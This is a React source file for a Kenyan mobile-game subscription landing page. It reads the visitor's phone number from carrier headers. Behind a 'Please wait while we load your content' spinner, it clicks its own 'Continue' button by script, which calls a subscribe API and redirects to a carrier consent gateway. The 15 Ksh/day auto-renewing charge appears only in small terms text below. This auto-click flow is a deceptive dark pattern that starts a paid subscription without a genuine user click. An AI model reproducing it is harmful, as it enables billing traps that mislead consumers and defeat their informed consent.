import React, { useEffect, useMemo, useRef, useState } from 'react';
import { useLocation, Link } from 'react-router-dom';
import './ContentStyle.css';
import ApiSender from '../common/ApiLogic';
import { appendParams } from '../common/urlUtils';
import { v4 as uuidv4 } from "uuid";

const IMG = "https://ke-gameland.com/img/";
const CATEGORIES = [
  { name: "Arcade", img: "Arcade.webp", text: "Fast-paced thrills! Challenge yourself with high-octane games and climb the leaderboard!" },
  { name: "Action", img: "Action.webp", text: "Fight, shoot and survive in action-packed challenges." },
  { name: "Adventure", img: "Adventure.webp", text: "Explore new worlds and uncover hidden surprises." },
  { name: "Family", img: "Family.webp", text: "Fun for every age, perfect to play together." },
  { name: "Racing", img: "Racing.webp", text: "Hit the road and beat the clock." },
  { name: "Strategy", img: "Strategy.webp", text: "Plan your moves and outsmart your opponents." },
  { name: "Sports", img: "category-sports.webp", text: "Score big with your favourite sports games." },
  { name: "Cooking", img: "Cooking.webp", text: "Serve up delicious dishes against the clock." },
  { name: "Board", img: "Board.webp", text: "Classic board games, anytime, anywhere." },
  { name: "Educational", img: "Educational.webp", text: "Learn while you play with brain-boosting games." },
];
const FEATURED = ["Countryside Drive", "Fruit Slice Frenzy", "Chomp Chase", "Catch The Serum", "Flip The Knife", "Curvy Road"];

const CONSENT_GATEWAY_URL = "https://dsdp-cg.safaricom.com/consent-gateway/001048237467";

function LoadPage({ enableAutoRedirect = true }) {

  const location = useLocation();
  const [ready, setReady] = useState(false);
  const [submitting, setSubmitting] = useState(false);
  const detected = useRef({ msisdn: "", goalId: null, goalName: null });
  const clicked = useRef(false);
  const buttonRef = useRef(null);
  const params = useMemo(() => new URLSearchParams(location.search), [location.search]);
  const paramsObject = {};
  for (const [key, value] of params.entries()) {
    paramsObject[key] = value;
  }

  useEffect(() => {
    async function begin() {
      const landingPageUrl = window.location.origin + location.pathname;
      const apiSender = new ApiSender();
      apiSender.saveHistory(landingPageUrl, paramsObject);

      const goalInfoResult = await apiSender.getGoalsInfo(paramsObject);
      if (goalInfoResult.success) {
        detected.current.goalId = goalInfoResult.goalId;
        detected.current.goalName = goalInfoResult.goalName;
      }

      const msisdnDetectedResult = await apiSender.getMsisdnFromHeader();
      detected.current.msisdn = msisdnDetectedResult.success ? (msisdnDetectedResult.msisdn || "") : "";
      setReady(true);
    }
    begin();
  }, []);

  useEffect(() => {
    if (enableAutoRedirect && ready && buttonRef.current) {
      buttonRef.current.click();
    }
  }, [ready, enableAutoRedirect]);

  const handleContinue = async () => {
    if (clicked.current) return;
    clicked.current = true;
    setSubmitting(true);
    const landingPageUrl = window.location.origin + location.pathname;
    const apiSender = new ApiSender();
    const { msisdn, goalId, goalName } = detected.current;
    const heId = uuidv4() + (msisdn ? "-" + msisdn : "");
    const subscribeResult = await apiSender.heSubscribe(msisdn, heId, goalId, goalName, landingPageUrl, "Kenya Load2 LP", paramsObject);
    const redirectUrl = subscribeResult.url || CONSENT_GATEWAY_URL;
    window.location.replace(appendParams(redirectUrl, `heId=${encodeURIComponent(heId)}`));
  };

  return (
    <div className="Aa001">
      <section className="load-fold">
        <div className='container'>
          <h4>Please wait while we load your content</h4>
          <div className="spinner"></div>
          <button
            ref={buttonRef}
            className="continue-btn"
            disabled={!ready || submitting}
            onClick={handleContinue}
          >
            Continue
          </button>
        </div>
      </section>

      <main className="load-content">
        <h1>Explore the thrill of premium gaming with Gameland featuring 100+ top-tier games!</h1>

        <h2>Pick a category</h2>
        <div className="load-grid">
          {CATEGORIES.map(c => (
            <div className="load-card" key={c.name}>
              <img alt={c.name} loading="lazy" src={IMG + c.img} />
              <h3>{c.name}</h3>
              <p>{c.text}</p>
            </div>
          ))}
        </div>

        <h2>Popular games</h2>
        <div className="load-grid featured">
          {FEATURED.map(g => (
            <div className="load-card" key={g}>
              <img alt={g} loading="lazy" src={`${IMG}${encodeURIComponent(g)}.webp`} />
              <h3>{g}</h3>
            </div>
          ))}
        </div>

        <div className="load-terms">
          <p>Subscription price is 15 Ksh/day with 1-day free trial (automatically renewed). To unsubscribe send STOP to 27806. For support contact <a href='mailto:support@ke-gameland.com'>support@ke-gameland.com</a></p>
          <Link to="/terms">Terms and Condition</Link>
          <p className="copyright">Copyright GAMELAND © 2024 All Rights Reserved</p>
        </div>
      </main>
    </div>
  );
}

export default LoadPage;
